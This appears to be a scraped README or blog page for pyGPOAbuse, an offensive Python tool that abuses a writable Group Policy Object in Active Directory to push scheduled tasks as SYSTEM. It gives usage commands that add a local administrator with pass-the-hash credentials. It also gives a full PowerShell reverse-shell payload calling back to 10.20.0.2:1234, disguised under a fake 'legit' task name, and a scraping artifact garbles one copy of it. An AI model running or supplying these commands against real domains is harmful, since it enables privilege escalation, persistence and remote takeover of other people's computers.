![""]("https://blogger.googleusercontent.com/img/a/AVvXsEiIsxrP6JFy-eHuQ2NmbSK9M3bnxQI6dMOcrZoH2_L4K2iDNMOgg_SYHlUyI3lWB6s92BcqgvSP39sLIOGnTgwzFg1UgFj3M0O9br2z3so_P4KngmioQEURu-nArypXCxa55VOQ--_XR90mrko2FSBnxaQJKfCcS7xHxVgxFgV15GoYdoiqbzaHJ_Ro2r0f=w640-h272")
Python partial implementation of SharpGPOAbuse by@pkb1s
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.
Default behavior adds a local administrator.
How to use
Basic usage
Add john user to local administrators group (Password: H4x00r123..)
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"Advanced usage
Reverse shell example
&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ -taskname "Completely Legit Task" \ -description "Dis is legit, pliz no delete" \ -user" dir="auto">
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-userCredits
- @pkb1s for SharpGPOAbuse
- @airman604 for schtask_now.py
- @SkelSec for msldap